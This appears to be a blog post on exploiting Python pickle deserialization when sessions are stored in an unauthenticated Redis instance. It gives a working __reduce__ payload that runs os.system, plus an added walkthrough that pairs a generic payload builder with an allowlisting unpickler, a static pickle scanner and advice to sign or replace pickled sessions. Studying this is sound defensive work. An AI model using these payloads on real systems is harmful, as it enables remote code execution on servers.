Python deserialization exploitation

Posted by bfpiaoran on April 11, 2019

A scenario I happened to come across today: a Redis instance with unauthenticated access, but running with reduced privileges. Redis is used to store user sessions, and the Python backend reads the session out of Redis and deserializes it.

First, a look at what pickle serialization looks like:

Then write the payload into Redis: when the session is accessed, Python deserializes it and that gives RCE. The payload runs in the backend process that calls pickle.loads, not in Redis, so Redis having been de-privileged does not limit it.

Here is a test example.

s is the payload.

import pickle
import os

# Any object whose __reduce__ returns (callable, args) is serialized as an
# instruction to call callable(*args) when it is unpickled.
class exp(object):
    def __reduce__(self):
        s = "calc.exe"  # command that runs on the victim when the pickle is loaded
        return (os.system, (s,))

e = exp()
s = pickle.dumps(e)  # s is the payload: it references os.system, not the exp class

# Write the payload out; in the real scenario this is what gets stored in Redis.
with open("rce", "wb") as f:
    f.write(s)

# The "server" side: loading the bytes calls os.system("calc.exe"), and the
# unpickled value is that call's return code, which is what gets printed.
with open("rce", "rb") as f:
    data = pickle.loads(f.read())
    print(data)
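To carry the test example through to the Redis session scenario, here is an added example written for this edit; it is not code from the original post. It assumes a plain dict as a stand-in for Redis (SESSION_STORE), and uses builtins.eval returning the process id in place of os.system("calc.exe") so the effect is observable without spawning a process; the payload shape is otherwise the same __reduce__ trick. It pairs the vulnerable loader with a RestrictedUnpickler allowlist, prints the opcode listing that the page's screenshot shows, and adds a static scanner (referenced_globals) that lists the globals a blob would import without executing it, so you can audit what is already in Redis.

```python
import io
import os
import pickle
import pickletools

# Constructed stand-in for the Redis instance holding sessions: key -> raw bytes.
# In the page's scenario an attacker can write to Redis, so any value may be replaced.
SESSION_STORE = {}


def build_payload(func, args):
    """Attacker side: serialise an object whose __reduce__ tells the unpickler to
    call func(*args). The page's payload is build_payload(os.system, ("calc.exe",))."""
    class Exp:
        def __reduce__(self):
            return (func, args)
    return pickle.dumps(Exp())


def demo_payload():
    # Harmless stand-in for os.system: builtins.eval runs arbitrary Python inside the
    # victim process, and its return value becomes the "unpickled object".
    return build_payload(eval, ("__import__('os').getpid()",))


def disassemble(data):
    """Opcode listing of a pickle (the view the page's screenshot shows), as a string."""
    out = io.StringIO()
    pickletools.dis(data, out=out)
    return out.getvalue()


def referenced_globals(data):
    """Static scan, no execution: the (module, name) pairs a pickle would import via
    GLOBAL or STACK_GLOBAL. Useful for auditing session blobs already sitting in Redis.
    Limitation: memo references (BINGET) to earlier strings are not resolved."""
    found = []
    strings = []  # string constants pushed so far; STACK_GLOBAL consumes the last two
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":          # protocol <= 3: arg is "module name"
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":  # protocol >= 4: operands came via the stack
            found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened loader: refuse every global except an explicit allowlist. os.system is
    pickled as posix.system on Linux and nt.system on Windows, so always match on the
    exact (module, name) pair rather than on whether the module looks harmless."""
    SAFE_GLOBALS = {("datetime", "datetime")}  # extend only with what sessions need

    def find_class(self, module, name):
        if (module, name) in self.SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def save_session(session_id, session):
    SESSION_STORE[session_id] = pickle.dumps(session)


def load_session_vulnerable(session_id):
    # What the page's backend does: pickle.loads on whatever Redis hands back.
    return pickle.loads(SESSION_STORE[session_id])


def load_session_restricted(session_id):
    return RestrictedUnpickler(io.BytesIO(SESSION_STORE[session_id])).load()


def demo():
    """Run the scenario end to end and report what each loader did."""
    original = {"user": "alice", "admin": False}
    save_session("sess-1", original)
    legit = (load_session_vulnerable("sess-1") == original
             and load_session_restricted("sess-1") == original)

    # Attacker with Redis write access overwrites the session blob.
    SESSION_STORE["sess-1"] = demo_payload()
    executed = load_session_vulnerable("sess-1") == os.getpid()  # eval ran in our process
    try:
        load_session_restricted("sess-1")
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    return {"legit_roundtrip": legit, "payload_executed": executed,
            "restricted_blocked": blocked,
            "globals_in_payload": referenced_globals(demo_payload())}


if __name__ == "__main__":
    print(disassemble(demo_payload()))
    print(demo())
```

The allowlisting unpickler is a mitigation, not the fix: the real fix is to never pickle data an attacker can write, for example by storing sessions as JSON, or at least to HMAC-sign the blob with a key Redis never holds so that a value written through the unauthenticated Redis port fails verification before pickle.loads is ever reached.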